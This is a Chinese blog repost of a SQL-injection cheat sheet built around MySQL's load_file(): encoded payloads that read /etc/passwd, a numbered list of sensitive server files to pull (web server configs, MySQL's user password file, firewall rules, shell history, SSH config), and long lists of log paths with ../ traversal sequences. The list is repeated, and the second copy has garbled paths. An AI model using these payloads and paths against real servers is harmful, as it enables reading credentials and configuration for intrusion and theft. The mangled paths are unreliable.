zoukankan      html  css  js  c++  java
  • load_file() 常用敏感信息

    load_file() 常用敏感信息

    1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

    2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
    上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

    3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

    4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

    5、c:Program FilesApache GroupApacheconfhttpd.conf 或C:apacheconfhttpd.conf 查看WINDOWS系统apache文件

    6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.

    7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

    8、d:APACHEApache2confhttpd.conf

    9、C:Program Filesmysqlmy.ini

    10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径

    11、 c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置文件

    12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

    13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

    14 、/usr/local/app/apache2/conf/extratpd-vhosts.conf APASHE虚拟主机查看

    15、 /etc/sysconfig/iptables 本看防火墙策略

    16 、 /usr/local/app/php5 b/php.ini PHP 的相当设置

    17 、/etc/my.cnf MYSQL的配置文件

    18、 /etc/redhat-release 红帽子的系统版本

    19 、C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码

    20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.

    21、/usr/local/app/php5 b/php.ini //PHP相关设置

    22、/usr/local/app/apache2/conf/extratpd-vhosts.conf //虚拟网站设置

    23、c:Program FilesRhinoSoft.comServ-UServUDaemon.ini

    24、c:windowsmy.ini

    25、/etc/issue 显示Linux核心的发行版本信息

    26、/etc/ftpuser

    27、查看LINUX用户下的操作记录文件.bash_history 或 .bash_profile

    28、/etc/ssh/ssh_config


    /etc/httpd/logs/error_log
    /etc/httpd/logs/error.log
    /etc/httpd/logs/access_log
    /etc/httpd/logs/access.log
    /var/log/apache/error_log
    /var/log/apache/error.log
    /var/log/apache/access_log
    /var/log/apache/access.log
    /var/log/apache2/error_log
    /var/log/apache2/error.log
    /var/log/apache2/access_log
    /var/log/apache2/access.log
    /var/www/logs/error_log
    /var/www/logs/error.log
    /var/www/logs/access_log
    /var/www/logs/access.log
    /usr/local/apache/logs/error_log
    /usr/local/apache/logs/error.log
    /usr/local/apache/logs/access_log
    /usr/local/apache/logs/access.log
    /var/log/error_log
    /var/log/error.log
    /var/log/access_log
    /var/log/access.log
    /etc/mail/access
    /etc/my.cnf
    /var/run/utmp
    /var/log/wtmp


    ../../../../../../../../../../var/log/httpd/access_log
    ../../../../../../../../../../var/log/httpd/error_log
    ../apache/logs/error.log
    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../../../../var/www/logs/access_log
    ../../../../../../../../../../var/www/logs/access.log
    ../../../../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../../../../var/log/apache/access_log
    ../../../../../../../../../../var/log/apache/access.log
    ../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../var/www/logs/error_log
    ../../../../../../../../../../var/www/logs/error.log
    ../../../../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../../../../var/log/apache/error_log
    ../../../../../../../../../../var/log/apache/error.log
    ../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../var/log/error_log
    /var/log/httpd/access_log
    /var/log/httpd/error_log
    ../apache/logs/error.log
    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    /etc/httpd/logs/acces_log
    /etc/httpd/logs/acces.log
    /etc/httpd/logs/error_log
    /etc/httpd/logs/error.log
    /var/www/logs/access_log
    /var/www/logs/access.log
    /usr/local/apache/logs/access_log
    /usr/local/apache/logs/access.log
    /var/log/apache/access_log
    /var/log/apache/access.log
    /var/log/access_log
    /var/www/logs/error_log
    /var/www/logs/error.log
    /usr/local/apache/logs/error_log
    /usr/local/apache/logs/error.log
    /var/log/apache/error_log
    /var/log/apache/error.log
    /var/log/access_log
    /var/log/error_log

    1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
      2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
      上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
      3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
      4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
      5、c:Program FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf  查看WINDOWS系统apache文件
      6、c:/Resin-3.0.14/conf/resin.conf   查看jsp开发的网站 resin文件配置信息.
      7、c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
      8、d:APACHEApache2confhttpd.conf
      9、C:Program Filesmysqlmy.ini
      10、../themes/darkblue_orange/layout.inc.php  phpmyadmin 爆路径
      11、 c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置文件
      12、 /usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
      13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
      14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
      15、 /etc/sysconfig/iptables 本看防火墙策略
      16 、 usr/local/app/php5 b/php.ini  PHP 的相当设置
      17 、/etc/my.cnf  MYSQL的配置文件
      18、 /etc/redhat-release   红帽子的系统版本
      19 、C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码
      20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
      21、/usr/local/app/php5 b/php.ini //PHP相关设置
      22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
      23、c:Program FilesRhinoSoft.comServ-UServUDaemon.ini
      24、c:windowsmy.ini
    ————————————————
    原文链接:https://blog.csdn.net/god_7z1/article/details/6805883

  • 相关阅读:
    Linux编程 22 shell编程(输出和输入重定向,管道,数学运算命令,退出脚本状态码)
    mysql 开发进阶篇系列 46 物理备份与恢复( xtrabackup的 选项说明,增加备份用户,完全备份案例)
    mysql 开发进阶篇系列 45 物理备份与恢复(xtrabackup 安装,用户权限,配置)
    mysql 开发进阶篇系列 44 物理备份与恢复( 热备份xtrabackup 工具介绍)
    Linux编程 21 shell编程(环境变量,用户变量,命令替换)
    Linux编程 20 shell编程(shell脚本创建,echo显示信息)
    mysql 开发进阶篇系列 43 逻辑备份与恢复(mysqldump 的基于时间和位置的不完全恢复)
    Linux编程 19 编辑器(vim 用法)
    (网页)angularjs中的interval定时执行功能(转)
    (网页)在SQL Server中为什么不建议使用Not In子查询(转)
  • 原文地址:https://www.cnblogs.com/bonelee/p/14882803.html
Copyright © 2011-2022 走看看